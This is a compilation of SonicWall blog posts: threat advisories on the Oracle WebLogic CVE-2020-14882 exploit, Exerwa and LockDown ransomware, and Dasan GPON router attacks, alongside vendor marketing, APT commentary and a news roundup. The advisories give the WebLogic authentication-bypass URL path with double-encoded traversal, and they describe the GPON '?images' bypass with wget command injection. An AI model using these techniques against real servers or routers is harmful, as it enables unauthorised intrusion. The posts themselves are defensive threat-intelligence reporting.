CVE-2020-14882 Oracle WebLogic Remote Code Execution Vulnerability Exploited in the Wild

SonicWall Capture Labs Threat Research team has observed that the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data via HTTP.

Oracle WebLogic is one of the widely used Java application servers. It helps building and deploying distributed web  applications for large enterprise web applications.

Vulnerability | CVE-2020-14882

A remote code execution vulnerability exist in Oracle WebLogic Server. The vulnerability is due to
improper validation of user supplied data in com.bea.console.utils.MBeanUtilsInitSingleFileServlet and
com.bea.console.handles.HandleFactory class.

The vulnerable class com.bea.console.handles.HandleFactory can be triggered using a HTTP request with the following structure:

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=<class_name>

MBeanUtilsInitSingleFileServlet does not implement a proper mechanism to filter out the directory traversal
characters “..” nor does it check if the user is authenticated. As a consequence, an attacker can
access “/console/css/%252E%252E%252Fconsole.portal” where “%252E” is double url encoded value of “..”
to bypass the authentication and provide a request parameter containing the word “handle” where the
parameter value is the name of a Class that may be used maliciously and will be instantiated by the
com.bea.console.handles.HandleFactory class.

This exploit allows an unauthenticated attacker to achieve remote code execution on a vulnerable Oracle WebLogic Server by sending a crafted HTTP GET request. Successful exploitation results in the execution of arbitrary code under the security context of the user running WebLogic Server.

Exploit Requests

The following exploits are currently being used:

http://x.x.x.x:7001

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 14003 Oracle WebLogic Server Remote Command Execution 3
IPS: 15218 Oracle WebLogic Server Remote Command Execution 2

 

Exerwa ransomware leaked from CTF hacker event

The SonicWall Capture Labs threat research team has observed reports of Hungarian PC users infected by Exerwa ransomware. It is reported that Exerwa is CTF malware that emerged from a Capture-the-Flag event where hackers are tasked to build functional ransomware in the shortest possible time. Unfortunately, some code from this event has ended up in the wild. The code is very basic and the initial infection vector is via a word document using macros.

 

Infection Cycle:

 

Upon opening the Word document the following page is shown:

 

A .bat script can be seen on the second page:

 

Once the macro has run, the following files are dropped on to the system:

  • %USERPROFILE%\Exerwa\decode.bat
  • %USERPROFILE%\Exerwa\exec.enc
  • %USERPROFILE%\Exerwa\script.enc
  • %USERPROFILE%\Exerwa\exec.exe
  • %USERPROFILE%\Exerwa\script.ps1

 

script.enc contains the following encrypted data:

 

exec.enc contains the following encrypted data:

 

decode.bat is run.  It contains the following commands:

 

 

exec.enc is decrypted using the built-in Windows certutil program and exec.exe is created.  It is a non-malicious generic Xor encryption tool by Luigi Auriemma:

 

script.enc is decrypted with certutil and script.ps1 is created.  It contains the following powershell script:

 

This script contains a loop to encrypt files within a given directory using the Xor tool.  As shown in the script, “.exerwa” is appended to the names of encrypted files.

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Exerwa.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Defending Against Tomorrow’s APTs

Adapted from SentinelOne

In my previous blog, I discussed the modern state of Advanced Persistent Threat (APT) groups, and in this one I will discuss the APT groups as they move forward.

As we saw this year, the present COVID-19 pandemic has created powerful opportunities for nations to hack and spy on one another. Quite aside from the power of phishing lures related to Coronavirus themes, the race to be first to obtain a vaccine has led to a number of incidents of espionage related to stealing IP from research laboratories. Based on recent evidence, it is likely that we will see further APT campaigns trying to take advantage of the security vulnerabilities brought about by workplace disruption – from office to home and back again – that at present do not seem to have any end in sight, and will certainly extend into 2021 at least.

Aside from pandemic-related matters, 2020 is a year that has seen widespread political, social, economic and climate disruption in the U.S., and to a certain extent in the U.K. and Europe, as well. All these are grist to the mill for cyber threat actors, who will seize on any opportunity to leverage current events to further their campaigns.

Defending the Enterprise in an Era of Cyber Uncertainty

It sounds like a grim picture, but enterprises are far from helpless or alone. Recent sanctions imposed on Iranian hackers by the U.S., proposed EU sanctions against Russian hacking, and joint announcements by officials in countries like U.S. and U.K. (such as a recent statement blaming China, Iran and Russia in attempts to steal COVID-19 vaccine research) signal greater international cooperation that will hopefully help in reducing such destructive activities.

There are a number of initiatives to protect the healthcare industry from cyber threats during COVID-19, as well as partnerships between nations, law enforcement agencies and public-private collaboration efforts that are also being developed to improve enterprise cybersecurity against advanced persistent threat actors.

At an organizational level, the time when it was possible to believe your organization may not be “interesting” to advanced attackers is well and truly behind us. Nation-state actors are hoovering up masses of data related to organizations and individuals simply because they can, and because they never know when it might be useful.

These nation-state actors rely heavily on social engineering to obtain credentials, deliver their payloads via emails (usually hidden within documents or images), and infect endpoints in order to obtain access to data and then exfiltrate it.

Given the diverse and increasing number of threats, companies need to ensure that they conduct full risk assessment, develop a security plan that includes incident response and business continuity contingencies, and deploy trusted technological solutions to ease the burden on staff.

How to Defend Against Them

Despite a mostly remote workforce due to shelter-in-place orders, it is still vital to build a layered defense that starts at the network and moves down the endpoint and then back up to the cloud. This is the part where I issue you a friendly warning that I will talk about SonicWall solutions.

When I talk about preventative measures, I usually start with the perimeter as traffic is passing into the network. If you’ve listened to my presentations before, I like to first talk about known threats and how SonicWall is identifying and creating definitions for around 140K new threats each business day. These are pushed to SonicWall devices and services to stop known threats, which usually solves around 99% of threats today. But when it comes to APTs and targeted attacks, these definitions may not help. Despite the fact that network firewalls and the storied Next-Generation Firewall have been on the market for some time, these work horses of security are still doing the lion’s share of protecting networks — first by scrubbing for known threats, and then by utilizing a variety of resources to stop attacks while managing traffic.

This is where additional technology is required to find unknown threats. This is usually a mix of heuristics on endpoints and sandboxes on the network. At SonicWall, we deploy a technology on nearly every service and product we sell called Capture Advanced Threat Prevention (Capture ATP) with Real-Time Deep Memory Inspection (RTDMI). In order for it to work, a file would have to hit a static check for presence on an allow or block list. If it is not on either, it is sent to either a Capture ATP point of presence (PoP) for examination by the cloud-based sandboxing technology, or to your on-premise Capture Security appliance (CSa) for examination. Capture ATP will examine files in parallel in multiple sandbox engines to look for malicious behavior and report back the results. In February 2018, we added RTDMI to Capture ATP at no additional charge. This technology tests files and code in memory to find results quicker and with more accuracy. Besides our private industry customers, it is this technology that our state, local and federal government customers rely on for safety, particularly against newly minted ransomware attacks.

With phishing the number-one vector in most compromises, phishing awareness training backed by advanced email security that can recognize known and unknown threats is a priority. How we handle classifying the known threats and unknown threats is listed above. It is the work of our Capture Labs team to create static definitions, and the work of Capture ATP to scout for the unknown.

With our work-from-home state of things, endpoint security may be your first and last line of defense. Unless you force your employees to route through the firewall via VPN or a cloud-based SASE solution, such as SonicWall Cloud Access Secure Access, to access the internet on their devices, odds are you will have to rely on endpoint security to keep them safe. SonicWall Capture Client is a lightweight, advanced heuristics-based endpoint security that looks at the system constantly (with around .1-.4% system usage) to check for malicious behavior with the intent of stopping attacks before they can execute. If something does cause damage, you can easily rollback the endpoint to its last-known clean slate.

Outside of the ability to block attacks whether or not they’ve been previously identified or not, a large focus recently has been adding the ability to catalog all the applications and vulnerabilities on all protected endpoints. APT attackers tend to focus on the latest exploits, since these should provide them with the largest and softest target to hit. This feature, called Application Vulnerability Intelligence, is vital for our customer base, particularly our enterprise and government customers, to mitigate the effects of a landed attack. Additionally, with its onboard content filtering technology, you can enforce your Web Content policies on the endpoint away from the perimeter, or just at least block access to all known malicious sites.

Beyond just listing a few SonicWall solutions in play here in the fight against APT groups, there are more solutions — from secure wireless to advanced reporting and analytics — that are great tools to discover and mitigate potential issues. For more information on these options, either view our website or contact our sales team, who will work with your existing networking and security technology partner or introduce to you one with the experience to meet your needs.

Conclusion

It wasn’t all that long ago that the very existence of APTs was something shrouded in myth and secrecy, but with public disclosures and leaks of APT toolkits now in the public domain, it seems nation-state actors are not nearly so shy or retiring as they once were. Discussion of APT activity is now part of mainstream cyber discourse, with all sides seemingly content to openly acknowledge that cyber warfare between nations is part of the “new normal” that will be with us for some time to come.

Businesses need to understand that in our interconnected world, there is no such thing as being either “invisible” or “uninteresting” to advanced cyber attackers. Know it or not, like it or not, if you’re online storing and processing data, and engaged in any kind of commercial relationships, there’s an APT cyber threat actor out there interested in you, your data, your product, your clients and/or your providers.

While that might sound scary, fortunately APTs and their tactics, techniques and procedures are also no longer shrouded in mystery. APTs are just another threat actor we all have to deal with. We are not alone in this fight, and we are not defenseless, so long as we first recognize the threat and then take appropriate measures.

I invite you to continue reading one of SonicWall’s many solution briefs on a variety of subjects. Let me leave you with a few options that might direct you to something more specialized.

Black Friday Preview: As Holiday Shopping Thrives Online, Will Cybercriminals Move In?

Despite this year’s deluge of emails and commercials already proclaiming, “BLACK FRIDAY IS HERE!” there are still several days until the official start of the holiday shopping season.

The realities of 2020 have seen the traditional doorbuster-type frenzy give way to a more diffuse set of bargains throughout the month (and even as early as October). But in the U.S., the period between Thanksgiving evening and 11:59 p.m. the following Monday is still expected to reign supreme, as shoppers rush to get the year’s best prices on electronics, home goods and appliances.

This year’s holiday shopping season comes amid perhaps the biggest wave of financial uncertainty to hit the U.S. since the recession of the late aughts. Combined with the ongoing COVID-19 pandemic and an unpredictable political climate, it’s little surprise that this year’s holiday shopping revenue is expected to fall short of the $184 billion spent this time last year.

Even so, according to NerdWallet, 201 million Americans, or roughly 8 out of 10, are expected to take part in the holiday shopping season of 2020 and will generate a still very robust $167 billion in sales.

But they won’t be standing in line at the mall to do so. While the shift toward online shopping goes back to at least 2005, when the term “Cyber Monday” was coined by the National Retail Federation, this year will almost certainly accelerate this trend, as people are choosing to avoid crowds for safety, are quarantining or are prohibited by law from doing things like massing in front of retail stores.

According to Digital Commerce 360, during the first 10 days of November, customers already spent $21.7 billion online, a 21% year-over-year increase — and the period from Thanksgiving through Cyber Monday is expected to generate 35-40% more online shopping than last year. Roughly 66% of shoppers say they’ll make more purchases online in 2020, with over 95% of people expected to buy half or more of their gifts online.

But while this might be good to help control the spread of the pandemic, it’s also good for cybercriminals. For the past few years, SonicWall Capture Labs threat researchers have recorded a higher than usual number of attacks taking place over the holiday shopping period. For example, in 2019, between Nov. 25 and Dec. 2, there were 129.3 million malware attacks (a 63% increase over 2018.) In the U.S. specifically, both malware (130%) and ransomware attacks (69%) were up compared to 2018.

What will this year hold? While 2020 continues to defy predictability, there’s already trouble on the horizon. The last quarter for which we have data, Q3 2020, showed some disturbing trends: In September, malware had its biggest rally of the year, increasing by 59 million over August. Worse, the 20% YoY increase in ransomware we saw at the end of Q2 had widened to a 40% increase by the end of Q3, having been on a steady rise since June

While it might be tempting to think this level of cybercrime would suggest we’re nearing some sort of ceiling and won’t see the sorts of increases over Black Friday weekend that we’ve seen in the past, everything we know about cybercriminals in 2020 refutes that. The cybercriminals we’ve seen at work during the pandemic have been as opportunistic and crafty as any we’ve seen before. And they’ve shown no qualms about targeting those they perceive as vulnerable, whether it’s hospitals, local governments or individual remote workers.

Unfortunately, this means holiday shoppers, more bargain-hungry than ever and doing most or all of their shopping online, could prove tempting quarry indeed — particularly since many people will be using the same devices and networks to shop that they use to connect to their employers’ corporate networks.

Of course, we hope that cybercriminals instead decide to cut us a rare break in a trying year and just watch some football. But no matter what happens, SonicWall’s threat researchers will be watching.

Cybersecurity Alphabet Soup: SDP, ZTNA and SASE

The technology industry is a breeding ground for creating TLAs (Three-Letter Acronyms) and FLAs (Four-Letter Acronyms). So inviting a few more TLAs and FLAs to the party is just business as usual.

In recent years we’ve added SDP and ZTNA, and in 2020 a new term, SASE, has continued picking up momentum.

If you aren’t sure what all these terms mean, here’s a quick refresher:

Software-Defined Perimeter (SDP)

Software-Defined Perimeter (SDP), also called a “Black Cloud,” is an approach to computer security. It evolved from the work done at the Defense Information Systems Agency (DISA) under the Global Information Grid (GIG) Black Core Network initiative around 2007.

Source: https://en.wikipedia.org/wiki/Software_Defined_Perimeter

If you don’t care for technical jargon, just think of SDP as an architecture that separates the control plane from the data plane while connecting users to the network. This separation helps to achieve access control, asset isolation, high availability and scale.

Zero Trust Network Access (ZTNA)

Zero Trust Network Access (ZTNA) is another security architecture in which only traffic from authenticated users, devices and applications is granted access to other users, devices and applications.

Source: https://www.sdxcentral.com/security/definitions/what-is-zero-trust-network-access-ztna/

Do these sound similar to you?

If so, it’s because they do have a lot in common — but since they were initiated by different organizations, they have different terminologies. There are some subtle differences as well. For example, when John Kindervag from Forrester first talked about Zero Trust in the year 2010, he talked about “Zero Trust Network Architecture.” The zero-trust principle, “never trust, always verify,” was envisioned as a way to address the broken traditional trust model.

Today’s ZTNA, Zero Trust Network Access, is a way to achieve Zero Trust for access — in other words, you would still need to inspect the traffic to achieve complete Zero Trust.

SDP, on the other hand, provides a much more prescriptive architecture (see below) that separates the control plane and the data plane.

Source: Cloud Security Alliance

Once this separation is in place, it’s easier to control access to the network based on various parameters such as user, device, time of the day, location, etc. The SDP architecture also mandates granting least-privileged access defined by the granular policies.

So, if you think about ZTNA carefully, you will realize that it actually uses the concept of SDP.

Secure Access Service Edge (SASE)

The term SASE was introduced by Gartner in August 2019, in its “The Future of the Network Security is in the Cloud” research report.

Source: https://www.gartner.com/document/3956841

As defined by Gartner analysts, SASE combines network security functions (such as SWG, CASB, FWaaS and ZTNA) with WAN capabilities (e.g., SD-WAN) to support the dynamic security needs of organizations.

Source: The Future of the Network Security Is in the Cloud

These capabilities are delivered primarily as a service (aaS) and based upon the identity of the entity, real-time context and security/compliance policies.

Does that term SASE feel like an umbrella term, then? If so, that’s because IMO it is.

Today, the biggest challenge for all cybersecurity vendors (SonicWall included) is to demonstrate that they have SDP, ZTNA and SASE solutions so that their customers don’t feel like they are missing out on innovative new trends.

As a result, we have following types of vendors, which originated in different cybersecurity domains, all trying to pitch their solutions as SDP, ZTNA and SASE.

  1. Cloud-delivered cybersecurity vendors – Recent additions to the ecosystem
  2. IdP vendors – Identity Providers
  3. SD-WAN vendors – Software-defined networking players
  4. New vendors – New companies that get added the ecosystem (as purists) with every new wave of acronyms
  5. Traditional cybersecurity vendors – Birthright indisputable, right? J

So, does SonicWall provide SDP, ZTNA or SASE solution(s)?

Hell yes! What kind of question is that?

To learn more about SonicWall’s ZTNA solution, check out our newly launched Cloud Edge Secure Access. You can be up and running in just a few minutes!

LockDown ransomware actively spreading in the wild

The SonicWall Capture Labs Threat Research team observed reports of a new variant family of LOCKDOWN ransomware actively spreading in the wild.

The LOCKDOWN ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <LOCKDOWN >
    • %App.path%\ [Name]. <bondy>
    • %App.path%\ [Name]. <Connect>
    • %App.path%\ [Name]. <sext>

Once the computer is compromised, the ransomware runs the following commands: (Actual Source code)

When LOCKDOWN is started it will create and assign a unique ID number to the victim then scan all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [LOCKDOWN] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends

This week hackers targeted hardware and software, with attacks on WordPress sites, printers, CPUs and the popular game “Among Us” making headlines.


SonicWall in the News

SonicWall Stresses Zero Trust, Zero Touch in 2020 — ChannelPro Network

  • A look at SonicWall’s business strategy in 2020, particularly SonicWall’s Cloud Edge solution, its Boundless 2020 virtual event, and commentary from Bill Conner and Dmitriy Ayrapetov.

Best Firewalls For Small Businesses — Business Pundit

  • Business Pundit has recognized SonicWall’s TZ firewall as the “Best Overall Firewall.”

SonicWall Refreshes Low Ends of TZ and NSa Firewall Portfolios and Unveils Zero Trust SonicWall Cloud Edge Secure Access — ChannelBuzz

  • SonicWall adds Cloud Edge Secure Access solution and new TZ and NSa firewalls to its lineup.

Firewalls And ZTNA Solution Protect Working Environments — LANline

  • LANline offers a closer look at SonicWall’s new NSFirewalls and ZTNA solution news.

SonicWall Expands Cybersecurity with New TCO Firewalls — APN News

  • SonicWall announced the expansion of its Capture Cloud Platform with the addition of the high-performance NSa 2700 firewall, three new cost-effective TZ firewall options and SASE offering debut.

Industry News

The 10 Coolest Cybersecurity Startups Of 2020 — CRN

  • Perimeter 81, who teamed up with SonicWall to create the Cloud Edge Secure Access solution, made CRN’s list of Coolest Cybersecurity Startups of 2020.

Cybersecurity Industry in Detroit Is Growing and Mentors Are Starting With Young People — Detroit Free Press

  • In an article on how Detroit’s cybersecurity industry is growing, Bill Conner offers cybersecurity tips for remote work.

Egregor ransomware bombards victims’ printers with ransom notes — Threatpost

  • The Egregor ransomware uses a novel approach to get a victim’s attention after an attack: it shoots ransom notes from all available printers.

Bitcoin hits nearly three-year peak, homes in on record — Reuters

  • Bitcoin has soared to its highest level since December 2017 as the asset’s perceived quality as a hedge against inflation lured institutional and retail demand.

Trump fires CISA chief Chris Krebs, who guarded the 2020 election from interference and domestic misinformation — Cyberscoop

  • President Donald Trump on Tuesday said he had fired Chris Krebs, a widely respected Department of Homeland Security official who helped protect the 2020 election from hacking and disinformation, the latest in a series of purges.

Forget Imposters. Among Us Is a Playground for Hackers — Wired

  • James Sebree, a researcher for security firm Tenable, on Tuesday published a blog post laying out a slew of relatively simple, hackable vulnerabilities in Among Us.

Hackers are actively probing millions of WordPress sites — Bleeping Computer

  • Unknown threat actors are scanning for WordPress websites with Epsilon Framework themes installed on over 150,000 sites and vulnerable to Function Injection attacks that could lead to full site takeovers.

Ransomware Operator Promotes Distributed Storage for Stolen Data — Dark Reading

  • The criminals behind the DarkSide ransomware-as-a-service operation say the system will be harder to take down.

Hackers can use just-fixed Intel bugs to install malicious firmware on PCs — Ars Technica

  • Vulnerabilities allowed hackers with physical access to override a protection Intel built into modern CPUs that prevents unauthorized firmware from running during the boot process. Known as Boot Guard, the measure is designed to anchor a chain of trust directly into the silicon to ensure that all firmware that loads is digitally signed by the computer manufacturer.

In Case You Missed It

Attackers actively targeting vulnerable Dasan GPON home routers

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in Dasan GPON home routers. DASAN Zhone Solutions is a provider of  network access solutions for service provider and enterprise networks. The company provides a wide array of reliable, cost-effective networking technologies—including broadband access, Ethernet switching, Passive Optical LAN and software-defined networks.
Attackers are targeting following two vulnerabilities in GPON home routers:

Authentication Bypass Vulnerability
It is possible to bypass authentication simply by appending “?images” to any URL of the device that requires authentication. For example by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. Attacker can then manage the device.(CVE-2018-10561)

Command Injection Vulnerability
Command Injection vulnerability exists in Dasan GPON home routers via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI.The router saves ping results in tmp directory and displays them when user visits diag.html. This can be used to inject and execute commands.(CVE-2018-10562)

Following exploit is spotted in the wild

The attacker takes advantage of the above vulnerabilities to bypass authetication by appending “?images” to the POST request. Then the attacker downloads a malicious executable by injecting “wget”  command. This is saved in the tmp directory and is executed when a user visits diag.html page.

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 13340:Dasan GPON Routers Command Injection
    • GAV:Mirai.H

Threat Graph

IoCs:
59.99.45.126
117.213.46.186
117.194.165.174
112.27.124.174
42.234.109.14
2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6

A quick look at Shodan reveals thousands of vulnerable devices

Making Sense of Today’s APT Groups

Adapted from SentinelOne

In recent months, there has been a marked uptick in nation-state cyber activity. Recently, we’ve learned that Chinese hackers stole information from Spanish centers working on COVID-19 vaccines. The U.S. Justice Department has indicted five Chinese nationals and two Malaysians who targeted over 100 companies, organizations and individuals in 14 countries. Three Iranian nationals have been indicted on charges of hacking U.S. aerospace and satellite companies, and APT39 has been spying on Iranian dissidents. Two additional Iranian hackers were also indicted for defacing multiple websites with pro-Iranian propaganda.

This surge in nation-state hacking activity is not a blip but a discernible trend. Attacks attributed to nation-state backed Advanced Persistent Threat (APT) groups have increased not only in terms of volume but also in scope and sophistication. The problem has been exacerbated because of COVID-19 and its impact on the global economy and international relations.

Concerns about APT groups used to be a niche topic discussed primarily by government security experts and the cybersecurity industry, but now it has reached mainstream awareness, as can be seen by statements from U.S., U.K. and other Western government officials. Most recently, Australian Defense Minister Linda Reynolds made a public statement expressing concerns that malicious cyberattacks against Australian businesses and government agencies from a state-based actor, believed to be China, had increased over the past two months.

In my personal experience with Russian ransomware authors, attacks on German, English and American private, corporate and government targets from the former Soviet Union have and will continue to be a consistent threat. Additionally, the biannual SonicWall Cyber Threat Report always shows clear evidence of these findings, since it gathers real threat data from over 1.1 million sensors located in over 215 countries and territories. What would be interesting to know is if these APT groups also fund themselves with ransomware to supplement their budgets from their government. We’ve seen this with North Korea, but the picture is unclear with Russian, Iranian and Chinese APT groups.

Making Sense of a Chaotic World

Reading all these headlines can be confusing. Who is attacking who, why and how? Let’s try to break down the different nation-state activities in cyberspace.

Sabotage – The virtual can break out into the physical when nations use cyber means to cause damage to computer systems or physical systems of other nations. Attacks on critical infrastructure have increased sharply in the last two years. Among them, a tit-for-tat between Israel and Iran: an Iranian attack on Israel’s water infrastructure led to Israeli retaliation against the port of Shahid Rajaee, a reminder — should anyone have forgotten Stuxnet — that nations are not averse to launching cyberattacks with destructive force on those they perceive as enemies.

Classic Espionage – Good old-fashioned spying is a much more common activity than sabotage. Nations have been spying on each other since forever, but today much of the old ‘spy-craft’ activities are conducted in cyberspace. Data theft is easier, cheaper and relatively risk-free when you’re behind a keyboard hacking into a server in a different country and protected by the laws and security services of your own government.

Global Political Influence – Nations have long used psyops to gain an advantage over other countries, but cyberspace has given them the means to do so on a scale that was never dreamt of before. Nations can interfere with political processes in other countries with little regard and great reward. For example, nation-state actors meddling in the Scottish independence referendum, U.K. Brexit referendum, and the U.S. 2016 and 2020 elections are well-documented.

Regional Politics – Nations also want to exert strength in cyberspace to resolve (or escalate) regional conflicts. Chinese cyberattacks on Indian entities followed a skirmish between the two nations in the mountainous border region of Ladakh that resulted in dozens of casualties. Ukrainian security services reported in 2019 that Russian-backed Gamaredon APT had repeatedly targeted Ukrainian military and law enforcement agencies and individuals. Gamaredon reportedly launched at least 482 cyberattacks against Ukrainian critical infrastructure targets in a Russian-backed campaign to pursue a proxy war in cyberspace without incurring the political fallout of an actual, boots-on-the-ground military campaign.

Industrial Espionage – Unlike “classic” espionage, this activity is specifically aimed at closing the economic gap between nations by stealing intellectual property, then using it to either copy and reproduce technology or gain other unfair commercial advantages. China has been widely accused of engaging in spying on Western businesses, government agencies and technology companies for just this purpose. For example, desiring to build its own stealth jet, the Asian superpower is believed to have stolen the proven design of the US F-35 to shorten development and “time to market.” It’s been estimated that theft of American trade secrets by China costs the U.S. somewhere in the region of $300 billion to $600 billon every year.

Crime – Some nations are under extreme financial burden, made worse by international sanctions, so they resort to cybercrime to fill their coffers. North Korea is notorious for utilizing cybercrime for such purposes, and recently launched yet another campaign aimed at stealing money from U.S. banks and ATMs. Other APT Lazarus campaigns have focused on stealing cryptocurrencies and impersonating cryptocurrency exchanges. Unlike many other APTs, Lazarus writes malware that targets macOS users, too, as Apple’s platform is increasingly used by C-suite executives and others wary of the plethora of Windows malware.

The future

Stay tuned for part two of this blog, where I discuss the future of APT groups and how we defend against them, then and now. For more information on the use of endpoint security in the defense of advanced threats, read our solution brief Fitting Endpoint Security to Your Organization.

Storms Ahead: The Dark Side of the Rush to the Cloud

Despite being constantly referred to as “the new normal,” the changes wrought by the COVID-19 pandemic are usually expressed in terms of endings. The end of the office. The end of the shopping mall. The end of the all-you-can-eat buffet. But there are some cases in which the pandemic has actually brought about growth—for example, the home office. Toilet paper. And the cloud.

Cloud adoption plans were already well underway by the time the COVID-19 pandemic began. But while most companies already had a digital transformation strategy in place, in many cases the new work reality wrought by the pandemic resulted in these plans being accelerated. For example, when businesses were forced to adopt remote work practically overnight, businesses drastically increased their dependence on cloud-based services, particularly videoconferencing and collaboration apps such as Zoom, Microsoft Teams and Slack.

During the first quarter of 2020, software company Flexera asked 750 global cloud decision makers and users about their cloud usage to get a better picture of who was moving to the cloud, how quickly they were moving, and some of the challenges they were facing. The resulting data shows a digital transformation landscape approaching maturity and largely delivering on its promises to improve the ways work gets done. But while problems stemming from unfamiliarity and inexperience are decreasing, more perennial problems have begun taking their place — particularly the complexity of securing the cloud, and the many and varied dangers businesses can face if they fail to do so.

IDG’s 2020 Cloud Computing Study found that 92% of organizations say their IT environment is at least somewhat in the cloud, with 38% saying they’re completely or nearly all in the cloud today. This finding was borne out by Flexara’s conclusions. In their 2020 State of the Cloud report1, Flexara reported that businesses in almost all industries leverage cloud computing, with more than half reporting they use cloud heavily and have reached the advanced cloud maturity level. Only 10% of respondents reported still being in the planning stage of their respective cloud strategies.

Notably, for the first time in the history of their State of the Cloud report, Flexara found that none of the respondents said they lacked cloud plans.

Just as significant is the speed at which companies are moving to the cloud. The IDG study found that 60% of respondents said they expected to be completely or nearly all in the cloud in 18 months, while Flexara’s respondents reported 53% of their workloads are run in a public cloud — a number they expected to rise to 60% over the next year.

Half of the Flexara study respondents’ data is housed in a public cloud, and is forecasted to rise 8% during the same time period.

While previous Flexara studies have found some respondents were reluctant to put sensitive consumer or corporate financial data in the cloud, more than half of the organizations surveyed this year said they’ll consider moving at least some of this type of data to the cloud.

Similar cloud research conducted by global research and advisory firm Gartner offers a look at the financial implications of digital transformation. Gartner’s data shows that the global public cloud market is expected to grow from $227.8 billion to $266.4 billion year over year, the largest portion of which will be allocated to SaaS offerings.

While findings from Flexara’s 2019 State of the Cloud report showed “managing cloud spend” and “governance” as the top cloud challenge, the most recent study showed that security had moved into the top spot for both SMBs and enterprises. 81% of respondents reported security as a challenge, including 83% of enterprises. In fact, “security” appeared in the top 3 concerns in every maturity category, from beginner to advanced.

Clearly, cloud maturity doesn’t solve all cloud challenges — particularly when attackers are getting more and more inventive when it comes to attacks on the cloud. But there is a lot you can do to safeguard your cloud usage and get the most out of your cloud investment. To learn more, register for the upcoming Mindhunter webinar.

1 © 2020 Flexera. All rights reserved. This work by Flexera is licensed under a Creative Commons Attribution 4.0 International License.